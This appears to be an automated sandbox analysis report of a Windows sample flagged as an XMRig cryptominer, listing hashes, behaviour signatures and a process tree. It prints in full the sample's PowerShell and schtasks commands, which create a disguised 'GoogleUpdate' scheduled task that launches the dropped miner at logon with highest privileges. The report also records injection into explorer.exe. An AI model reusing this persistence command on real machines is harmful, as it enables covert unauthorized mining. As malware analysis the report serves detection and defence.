Analysis
-
max time kernel
109s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/10/2024, 15:34
Static task
static1
Behavioral task
behavioral1
Sample
3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
Resource
win7-20240903-en
General
-
Target
3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
-
Size
9.8MB
-
MD5
6f804d98df32ee28685d8468e619dd87
-
SHA1
cc4813865c1600e7c7b772d692a37dd752a7cc6a
-
SHA256
3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
-
SHA512
af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4
-
SSDEEP
196608:NfZ+pJEfu095vo5n8xnzv0jr+ao/hNJu+y19RERUAc9s:Nsx09xo5m70nm5NJuVRERUAY
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 2504 created 1184 2504 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 21 PID 2504 created 1184 2504 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 21 PID 2748 created 1184 2748 uwpdater.exe 21 PID 2748 created 1184 2748 uwpdater.exe 21 PID 2748 created 1184 2748 uwpdater.exe 21 -
Xmrig family
-
XMRig Miner payload 14 IoCs
resource yara_rule behavioral1/memory/2748-27-0x000000013F2D0000-0x000000013FC99000-memory.dmp xmrig behavioral1/memory/2712-30-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-32-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-34-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-36-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-38-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-40-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-42-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-44-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-46-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-48-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-50-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-52-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2712-54-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 2748 uwpdater.exe -
Loads dropped DLL 1 IoCs
pid Process 2680 taskeng.exe -
pid Process 2336 powershell.exe 2156 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2748 set thread context of 2804 2748 uwpdater.exe 41 PID 2748 set thread context of 2712 2748 uwpdater.exe 42 -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2324 schtasks.exe 2564 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2504 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 2504 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 2336 powershell.exe 2504 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 2504 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe 2748 uwpdater.exe 2748 uwpdater.exe 2156 powershell.exe 2748 uwpdater.exe 2748 uwpdater.exe 2748 uwpdater.exe 2748 uwpdater.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeLockMemoryPrivilege 2712 explorer.exe Token: SeLockMemoryPrivilege 2712 explorer.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe 2712 explorer.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2336 wrote to memory of 2324 2336 powershell.exe 33 PID 2336 wrote to memory of 2324 2336 powershell.exe 33 PID 2336 wrote to memory of 2324 2336 powershell.exe 33 PID 2680 wrote to memory of 2748 2680 taskeng.exe 37 PID 2680 wrote to memory of 2748 2680 taskeng.exe 37 PID 2680 wrote to memory of 2748 2680 taskeng.exe 37 PID 2156 wrote to memory of 2564 2156 powershell.exe 40 PID 2156 wrote to memory of 2564 2156 powershell.exe 40 PID 2156 wrote to memory of 2564 2156 powershell.exe 40 PID 2748 wrote to memory of 2804 2748 uwpdater.exe 41 PID 2748 wrote to memory of 2712 2748 uwpdater.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe"C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:2504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTwaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe'3⤵
- Scheduled Task/Job: Scheduled Task
PID:2324
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTwaskMachineQC"2⤵PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTwaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe'3⤵
- Scheduled Task/Job: Scheduled Task
PID:2564
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2804
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2712
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0FB85D99-CEBC-4790-A8DE-57083CED402F} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exeC:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2748
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53bbed8e74c8ff53d762e23e157c46b11
SHA1fdee820f4138560d934884bcf67de8aa48620ef1
SHA25653452eaab90c12e26ba00f0b645272c6aef33e2f936e88deaf4efae56e0bb83e
SHA51201d26b9aa17077a8268ec29f80a8c848e1474d68ff193cec13f3ac0b56c604cd76bebc893e5e7d186e45301c60b7d7fe6db93710edeee4f47e2bd4af7bf4a185
-
Filesize
9.8MB
MD56f804d98df32ee28685d8468e619dd87
SHA1cc4813865c1600e7c7b772d692a37dd752a7cc6a
SHA2563b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
SHA512af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4